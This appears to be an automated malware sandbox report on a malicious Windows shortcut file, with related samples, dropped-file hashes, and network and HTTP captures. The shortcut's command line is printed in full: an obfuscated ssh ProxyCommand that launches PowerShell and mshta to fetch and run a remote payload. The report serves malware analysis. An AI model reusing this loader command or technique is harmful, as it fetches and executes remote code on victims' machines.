                                http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                • kklk16.bsyo45ksda.top/favicon.ico
                                gusetup.exeGet hashmaliciousUnknownBrowse
                                • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                • gmtagency.online/api/check
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CLOUDFLARENETUShttps://br.custmercompa.de/Get hashmaliciousUnknownBrowse
                                • 172.67.139.222
                                tyPafmiT0t.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                • 188.114.96.3
                                vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                • 104.21.85.189
                                Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                • 172.67.196.114
                                Statement of Account - USD 16,720.00.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.12.205
                                MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                • 162.159.61.3
                                MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                • 172.64.41.3
                                5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                • 104.21.96.1
                                zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                • 104.21.112.1
                                2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                • 104.21.64.1
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                37f463bf4616ecd445d4a1937da06e19setup.msiGet hashmaliciousUnknownBrowse
                                • 188.114.97.3
                                GYede3Gwn0.lnkGet hashmaliciousUnknownBrowse
                                • 188.114.97.3
                                6684V5n83w.exeGet hashmaliciousVidarBrowse
                                • 188.114.97.3
                                heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                • 188.114.97.3
                                zku4YyCG6L.exeGet hashmaliciousUnknownBrowse
                                • 188.114.97.3
                                hca5qDUYZH.exeGet hashmaliciousUnknownBrowse
                                • 188.114.97.3
                                Loader.exeGet hashmaliciousMeduza StealerBrowse
                                • 188.114.97.3
                                setup.msiGet hashmaliciousUnknownBrowse
                                • 188.114.97.3
                                BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                • 188.114.97.3
                                Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                • 188.114.97.3
                                No context
                                Process:C:\Windows\System32\svchost.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1310720
                                Entropy (8bit):0.7263431135564928
                                Encrypted:false
                                SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0/:9JZj5MiKNnNhoxum
                                MD5:05F3EBB01FB174B41FBCF042EBAE0CEC
                                SHA1:B21B09D4F560156ACBF2B294D0B4C3F2A7A646FE
                                SHA-256:DB6339B142F2282A48F061E92E7F88ABE51F6D947D3E92106BAF5254FC94D3F5
                                SHA-512:0609B1AF497F7FD3ABF296DE06577C22E6459C47EDDA37FF41A2061630E43538317F8995583ACE2B486C39F5766FBE594AF871353F79980DE66983861C715CE8
                                Malicious:false
                                Reputation:low
                                Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                Process:C:\Windows\System32\svchost.exe
                                File Type:Extensible storage user DataBase, version 0x620, checksum 0x509de5be, page size 16384, DirtyShutdown, Windows version 10.0
                                Category:dropped
                                Size (bytes):1310720
                                Entropy (8bit):0.7556115197066192
                                Encrypted:false
                                SSDEEP:1536:1SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:1azaSvGJzYj2UlmOlOL
                                MD5:1CBEFDE111F4A0B5F7F97AA7BADAE43C
                                SHA1:57E0EF0FCE710F5E399752C5639ADB007ACD84C7
                                SHA-256:E388486F343644AEC78F63C5760EDA3D76C3839B2A1870638EF643BEA8545795
                                SHA-512:2058D2051004673892BA9DE298A7B18A0C03DEBD8B2F0EF3D752F770BB9E73AF296AACA4E9D792771F9CE2DEF3542784320ED4761543750908EED7366B8FF36D
                                Malicious:false
                                Reputation:low
                                Preview:P..... .......7.......X\...;...{......................0.e......!...{?.1)...|1.h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{.....................................%1)...|1...................>1)...|1..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\System32\svchost.exe
                                File Type:COM executable for DOS
                                Category:dropped
                                Size (bytes):16384
                                Entropy (8bit):0.08029941034443144
                                Encrypted:false
                                SSDEEP:3:3/8YejRqeuNaAPaU1lro/lolluxmO+l/SNxOf:P8zjRluNDPaUD9gmOH
                                MD5:565A92330DF73299E4197E7BA86B4D54
                                SHA1:A5480F4112640EB64278E5A50BC13772F5F01ACF
                                SHA-256:46A2C420796C3A7FD484911213C9B5DAC806ABD282A23D5F9980EF7D060EAB10
                                SHA-512:11D741137B4666424FE752B0937ED5E0AEE0187DFD609F07620DC216B0FF1C7F95E3C1432F074018B64963D93F8215039EE1CD24F08A25550250B3CE55290C1E
                                Malicious:false
                                Reputation:low
                                Preview:.'.......................................;...{..1)...|1..!...{?..........!...{?..!...{?..g...!...{?...................>1)...|1.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\System32\mshta.exe
                                File Type:ASCII text, with very long lines (24050)
                                Category:dropped
                                Size (bytes):24051
                                Entropy (8bit):4.941039417164537
                                Encrypted:false
                                SSDEEP:192:VuR/6okgTQwq23gGM8lUR9YRGQ2BwoX6zp+1+nDT1FvxKSI7/UsV7MSE6XZ2dKzk:JwV+oUcoQJpdf1dxKSI7/Ue7ZX2qk
                                MD5:5E8C69A459A691B5D1B9BE442332C87D
                                SHA1:F24DD1AD7C9080575D92A9A9A2C42620725EF836
                                SHA-256:84E3C77025ACE5AF143972B4A40FC834DCDFD4E449D4B36A57E62326F16B3091
                                SHA-512:6DB74B262D717916DE0B0B600EEAD2CC6A10E52A9E26D701FAE761FCBC931F35F251553669A92BE3B524F380F32E62AC6AD572BEA23C78965228CE9EFB92ED42
                                Malicious:false
                                Preview:#cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapper del,#cf-wrapper details,#cf-wrapper dfn,#cf-wrapper div,#cf-wrapper dl,#cf-wrapper dt,#cf-wrapper em,#cf-wrapper embed,#cf-wrapper fieldset,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper form,#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper html,#cf-wrapper i,#cf-wrapper iframe,#cf-wrapper img,#cf-wrapper label,#cf-wrapper legend,#cf-wrapper li,#cf-wrapper mark,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper object,#cf-wrapper ol,#cf-wrapper output,#cf-wrapper p,#cf-wrapper pre,#cf-wrapper s,#cf-wrapper samp,#cf-wrapper section,#cf-wrapper small,#cf-wrapper span,#cf-wrapper strike,#cf-wrapper strong,#cf-wrapper sub,#cf-w
                                Process:C:\Windows\System32\mshta.exe
                                File Type:PNG image data, 54 x 54, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):452
                                Entropy (8bit):7.0936408308765495
                                Encrypted:false
                                SSDEEP:12:6v/7EljW8E6Cl2SYh8SZM4tf70FSDvMXDxJp6ScFChY9:U8hCl2SIdZBtAFSDUX/ozIhK
                                MD5:C33DE66281E933259772399D10A6AFE8
                                SHA1:B9F9D500F8814381451011D4DCF59CD2D90AD94F
                                SHA-256:F1591A5221136C49438642155691AE6C68E25B7241F3D7EBE975B09A77662016
                                SHA-512:5834FB9D66F550E6CECFE484B7B6A14F3FCA795405DECE8E652BD69AD917B94B6BBDCDF7639161B9C07F0D33EABD3E79580446B5867219F72F4FC43FD43B98C3
                                Malicious:false
                                Preview:.PNG........IHDR...6...6............3PLTE.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?..".....tRNS.@0.`........ P.p`...../IDATx.....0...l..6....+...~yJ.F"....oE..L.3..[..i2..n.WyJ..z&.....F.......b....p~...|:t5.m...fp.i./e....%.%...n.P...enV.....!...,.......E........t![HW.B.g.R.\^.e..o+........%.&-j..q...f@..o...]... ....u0.x..2K.+C..8.U.L.Y.[=.....y...o.tF..]M..U.,4..........a.>/.)....C3gNI.i...R.=....Q7..K......IEND.B`.
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):0.742582331134527
                                Encrypted:false
                                SSDEEP:3:Nlllul:NllU
                                MD5:D5EA69D574B45F59D5603CC768ADEC44
                                SHA1:B37A4F574EC363E2DD2536941DA0F9B09BD979FF
                                SHA-256:19AD8E2709420CF64185F14B06616636F9FABC38DD3727E4F01B03D8D0AF04D7
                                SHA-512:BEF2D830C4ED0F8A252F75523DEAD3B18BF91B5916147F48264E8FD71E7E5815605A3984FC67F93A39F12D3B006177E46D80141CF2371B9CF67EEB60D30078ED
                                Malicious:false
                                Preview:@...e.................................@. .......................
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\svchost.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):55
                                Entropy (8bit):4.306461250274409
                                Encrypted:false
                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                Malicious:false
                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                Entropy (8bit):2.704198709343711
                                TrID:
                                • Windows Shortcut (20020/1) 100.00%
                                File name:HngJMpDqxP.lnk
                                File size:2'466 bytes
                                MD5:c90cd850078a3688894afc507e6b9ce8
                                SHA1:7f9a31f6fef0350c319380e367e7f612f3ecce14
                                SHA256:70f3b05eb07d9af8dddbd9b5a0aa2e27bf4feda3bef1d4c1b50aaa4c722a1050
                                SHA512:7692a63cf069ac6a3ed48f8cce58a67c53e4f4461fb2238371f7938732e2c60d17a86258fcbcc34a704bd92256fb545f99f5402d50adc118e9795ea0816ea317
                                SSDEEP:24:8lj/BF//Z/Udt1v+/+G4WbUk6QZNfQt8KKdd79dsHhWUIeFIU:81LZwG4aUkjNfBKKdJ9Z5W
                                TLSH:895132043AF91725F3B39A7594BAA321853BBC46EEB29B0E004D02881727615E472F6B
                                File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                Icon Hash:72d282828e8d8dd5

                                General

                                Relative Path:..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
                                Command Line Argument: -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" .
                                Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                TimestampSource PortDest PortSource IPDest IP
                                Dec 31, 2024 15:41:47.849651098 CET49718443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:47.849711895 CET44349718188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:47.849808931 CET49718443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:47.860203028 CET49718443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:47.860227108 CET44349718188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:48.327445984 CET44349718188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:48.327578068 CET49718443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:48.829701900 CET49718443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:48.829744101 CET44349718188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:48.830183029 CET44349718188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:48.830354929 CET49718443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:48.858686924 CET49718443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:48.899329901 CET44349718188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:48.961910963 CET44349718188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:48.961966991 CET44349718188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:48.961997986 CET44349718188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:48.962027073 CET44349718188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:48.962059021 CET49718443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:48.962095022 CET44349718188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:48.962110996 CET44349718188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:48.962120056 CET49718443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:48.962152958 CET49718443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.049010992 CET49718443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.049051046 CET44349718188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.058100939 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.058161020 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.058288097 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.059288025 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.059308052 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.520025969 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.520113945 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.520998955 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.521023035 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.521197081 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.521203995 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.648046017 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.648112059 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.648119926 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.648149967 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.648169994 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.648199081 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.648211002 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.648221016 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.648243904 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.648282051 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.648294926 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.648335934 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.648343086 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.648381948 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.648387909 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.648400068 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.648428917 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.652772903 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.652837038 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.652854919 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.652882099 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.652894974 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.652916908 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.734731913 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.734793901 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.734798908 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.734823942 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.734836102 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.734865904 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.734869957 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.734884024 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.734908104 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.734935999 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.735408068 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.735455036 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.735462904 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.735502958 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.735513926 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.735560894 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.735666990 CET49719443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.735682011 CET44349719188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.826030970 CET49720443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.826077938 CET44349720188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:49.826193094 CET49720443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.826523066 CET49720443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:49.826530933 CET44349720188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:50.279084921 CET44349720188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:50.282253027 CET49720443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:50.282694101 CET49720443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:50.282712936 CET44349720188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:50.282888889 CET49720443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:50.282896042 CET44349720188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:50.396166086 CET44349720188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:50.396219015 CET49720443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:50.396241903 CET44349720188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:50.396274090 CET44349720188.114.97.3192.168.2.6
                                Dec 31, 2024 15:41:50.396318913 CET49720443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:50.396409988 CET49720443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:50.397036076 CET49720443192.168.2.6188.114.97.3
                                Dec 31, 2024 15:41:50.397057056 CET44349720188.114.97.3192.168.2.6
                                TimestampSource PortDest PortSource IPDest IP
                                Dec 31, 2024 15:41:47.831351042 CET5163753192.168.2.61.1.1.1
                                Dec 31, 2024 15:41:47.842442036 CET53516371.1.1.1192.168.2.6
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Dec 31, 2024 15:41:47.831351042 CET192.168.2.61.1.1.10x165eStandard query (0)klipzynigou.shopA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Dec 31, 2024 15:41:47.842442036 CET1.1.1.1192.168.2.60x165eNo error (0)klipzynigou.shop188.114.97.3A (IP address)IN (0x0001)false
                                Dec 31, 2024 15:41:47.842442036 CET1.1.1.1192.168.2.60x165eNo error (0)klipzynigou.shop188.114.96.3A (IP address)IN (0x0001)false
                                • klipzynigou.shop
                                • https:
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.649718188.114.97.34436096C:\Windows\System32\mshta.exe
                                TimestampBytes transferredDirectionData
                                2024-12-31 14:41:48 UTC329OUTGET /An4me.mp4 HTTP/1.1
                                Accept: */*
                                Accept-Language: en-CH
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: klipzynigou.shop
                                Connection: Keep-Alive
                                2024-12-31 14:41:48 UTC562INHTTP/1.1 403 Forbidden
                                Date: Tue, 31 Dec 2024 14:41:48 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Frame-Options: SAMEORIGIN
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5om3NfZWMUo%2BVpO29cMNIZFag%2B6iIRnXolkfymaae691alAt%2B9mWIQarL1KBn8M2IBal4P9UJsTM%2FI7cwFXriFQghoqgH0YYkJRMP%2F97OaUt%2Bp%2Bnl%2B5IAcqQYtS00HC0ymAM"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8fab0858a929437e-EWR
                                2024-12-31 14:41:48 UTC807INData Raw: 31 31 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                Data Ascii: 11ca<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                2024-12-31 14:41:48 UTC1369INData Raw: 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e
                                Data Ascii: cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElemen
